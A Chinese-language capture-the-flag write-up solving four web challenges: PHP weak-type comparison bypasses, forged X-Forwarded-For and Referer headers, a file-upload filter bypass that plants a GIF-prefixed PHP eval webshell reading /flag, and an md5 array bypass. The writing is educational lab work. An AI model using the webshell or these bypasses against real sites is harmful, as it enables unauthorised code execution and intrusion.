目录
simple_php
看到了一段PHP代码,解读一下:
这里包含了"config.php"文件,url接收参数a和b的值。如果$a的值等于0 and$a,那么输出$flag1,如果$b的值为数字或字符串则退出当前脚本,如果$b>1234则输出$flag2。
很明显,这里考察的是PHP代码中的弱类型比较(==):
当$a==0且$a!=null时,会输出$flag1。PHP中的弱类型会使比如说'b'==0为真。
当$b>1234时输出$flag2,PHP中的弱类型比较会使'1235a'=='1235'为真。
那么 我们构造Payload为:?a=b&b=1235a
拿到flag。
xff_referer
这里使用burp suite修改请求头中的X-Forwarded-For为123.123.123.123
丢包,看到"必须来自https://www.goole.com"的字样,继续伪造Referer为这个。
拿到flag。
X-Forwarded-For
是一个 HTTP 扩展头部,主要是为了让 Web 服务器获取访问用户的真实 IP 地址。在代理转发及反向代理中经常使用X-Forwarded-For 字段。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。
Referer
可以看作是一个防盗链,还可以防止恶意请求,存在于HTTP的请求头。
[ACTF2020 新生赛]Upload
显然是文件上传。
随便传一个"1.php"文件,提示该文件不允许上传,要求上传.jpg、.png、.gif等图片。
应该是有文件扩展名检查。
这里看到是有JS前端验证的。
改为"1.jpg"文件,再次上传发现上传成功。
但是用burp suite抓包时发现,我上传的文件内容被显示了出来,这里判断在后端进行了二次过滤。
这道题应该是前端进行了白名单验证,先把前端的验证删除掉。
发现上传成功。
我们抓包后写一个木马:
GIF89a //用GIF头来绕过检查 <script language='php'>@eval($_POST['ye']);</script> <script language='php'>system('cat /flag');</script>
成功拿到flag。
[MRCTF2020]Ez_bypass
先来分析一下源代码:
第一层if循环要求的是通过GET的方式传入两个参数id和gg。
如果没有传入两个参数就会在页面上输出Please input first,还有就是包含了文件"flag.php"。
第二层if判断,在这层进行一个md5强碰撞,满足条件后会在页面输出"You got the first step"。否则输出"You are not a real hacker!"
其余部分要求通过post的方式获取一个参数passwd,后面的if判断中都是在对passwd进行判断。
要求passwd不为空且必须不是一个数字,最后passwd==1234567
分析得知是一个php弱类型的问题,只需要POST传入 passwd=1234567a即可满足判断语句。
所以构造Payload为:GET方式提交gg[]=111&id[]=222,POST传参passwd=1234567a
拿到flag。